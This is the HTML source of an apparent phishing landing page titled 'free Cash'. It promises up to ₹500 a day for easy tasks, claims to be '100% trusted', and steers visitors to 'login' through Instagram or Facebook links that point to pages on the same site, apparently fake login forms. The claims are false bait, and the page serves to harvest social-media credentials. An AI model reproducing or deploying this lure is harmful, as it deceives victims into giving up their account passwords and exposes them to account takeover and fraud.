<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="/static/other/font-awesome-4.7.0/css/font-awesome.min.css" rel="stylesheet">
    <link rel="stylesheet" href="/static/css/landing.css">
    <title>free Cash</title>
    <link rel='icon' href='/static/other/cash-fav.png' type='image/png' />
    <link rel="prerender" href="/facebook">
    <link rel="prerender" href="/instagram">
    <link rel="prerender" href="/successStories">
    <link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@300&display=swap" rel="stylesheet">
</head>

<body id="body-1">
    <div class="cointainer" id="div-1">
        <div class="heading dataDiv" id="div-2">
            <h1 class="top textShadow" id="h1-1"><span id="hun"> Earn money daily </span> by doing easy tasks</h1>
            <h1 class="cost textShadow" id="h1-2">Are you bored and want to earn online money ?<span id="hun"> 100% </span> trusted site | Earn upto <span id="fifty"> ₹500 </span>daily</h1>
            <h1 class="last textShadow" id="h1-3">Just login by </h1>
            <h1 class="downArrow" id="h1-4">
                <i class="fa fa-hand-o-down" aria-hidden="true" id="i-1"></i>
            </h1>
        </div>

        <div class="links dataDiv" id="div-3">
            <h1 id="h1-5"><a class="insta" href="/instagram" id="a-1"><i class="fa fa-instagram" aria-hidden="true" id="i-2"></i>
                instagram</a></h1>


            <div class="orline" id="div-4">
                <div class="line" id="div-5">
                </div>
                <span class="orWord allcaps " id="span-1">or</span>
                <div class="line" id="div-6">
                </div>
            </div>

            <h1 class="face" id="h1-6">
                <a class="fb" href="/facebook" id="a-2"><i class="fa fa-facebook" aria-hidden="true" id="i-3"></i>
                facebook
                </a>
            </h1>
        </div>

        <a class="successes " href="/successStories">
            success stories...
        </a>

    </div>
</body>


</html>
